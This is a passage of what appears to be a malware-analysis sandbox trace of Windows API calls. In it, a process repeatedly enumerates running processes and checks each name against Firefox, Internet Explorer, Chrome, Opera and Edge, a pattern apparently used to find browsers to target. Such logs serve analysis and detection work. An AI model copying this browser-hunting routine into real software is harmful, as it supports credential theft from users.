(lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.747] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0206.747] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0206.747] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0206.747] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0206.747] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0206.747] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.747] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0206.748] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0206.748] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0206.748] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0206.748] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0206.748] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.748] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0206.749] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0206.749] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0206.749] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0206.749] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0206.749] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.749] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0206.749] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0206.749] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0206.749] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0206.749] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0206.749] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.749] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0206.750] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0206.750] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0206.750] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0206.750] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0206.750] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.750] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0206.750] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0206.750] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0206.751] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0206.751] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0206.751] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.751] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0206.751] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0206.751] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0206.751] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0206.751] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0206.751] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.751] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0206.752] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0206.752] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0206.752] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0206.752] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0206.752] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.752] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0206.752] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0206.752] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0206.752] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0206.752] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0206.752] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.753] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0206.753] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0206.753] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0206.753] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0206.753] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0206.753] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.753] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0206.754] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0206.754] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0206.754] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0206.754] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0206.754] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.754] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.754] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0206.754] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0206.754] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0206.754] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0206.754] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.754] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0206.755] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0206.755] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0206.755] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0206.755] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0206.755] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.755] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.803] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0206.803] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0206.803] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0206.803] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0206.803] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.803] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0206.804] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0206.804] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0206.804] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0206.804] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0206.804] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.804] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.804] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0206.804] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0206.804] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0206.804] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0206.804] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.804] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.805] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0206.805] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0206.805] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0206.805] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0206.805] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.805] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0206.805] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0206.805] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0206.805] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0206.805] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0206.806] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.806] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0206.806] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0206.806] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0206.806] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0206.806] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0206.806] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.806] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.807] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0206.807] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0206.807] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0206.807] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0206.807] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.807] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.807] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0206.807] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0206.807] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0206.807] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0206.807] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.807] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.808] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0206.808] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0206.808] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0206.808] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0206.808] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.808] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.808] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0206.808] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0206.808] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0206.808] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0206.809] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0206.809] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0206.809] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0206.809] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0206.809] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0206.809] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0206.809] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0206.809] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0206.810] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0206.810] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0206.810] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0206.810] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="opera.exe") returned 1 [0206.810] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0206.810] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0206.810] CloseHandle (hObject=0xe8) returned 1 [0206.810] Sleep (dwMilliseconds=0x3e8) [0207.847] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0207.850] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.850] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0207.850] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0207.850] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0207.850] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0207.850] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0207.850] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0207.851] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0207.851] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0207.851] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0207.851] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0207.851] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0207.851] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0207.851] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0207.851] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0207.851] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0207.851] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0207.851] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.851] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0207.852] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0207.852] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0207.852] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0207.852] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0207.852] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.852] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0207.853] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0207.853] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0207.853] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0207.853] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0207.853] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.853] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0207.853] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0207.853] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0207.853] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0207.853] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0207.853] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.853] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0207.854] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0207.854] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0207.854] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0207.854] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0207.854] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.854] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0207.854] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0207.854] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0207.854] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0207.854] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0207.854] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.854] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0207.855] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0207.855] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0207.855] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0207.855] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0207.855] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.855] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0207.856] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0207.856] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0207.856] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0207.856] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0207.856] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.856] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.856] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0207.856] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0207.856] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0207.856] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0207.856] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.856] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: 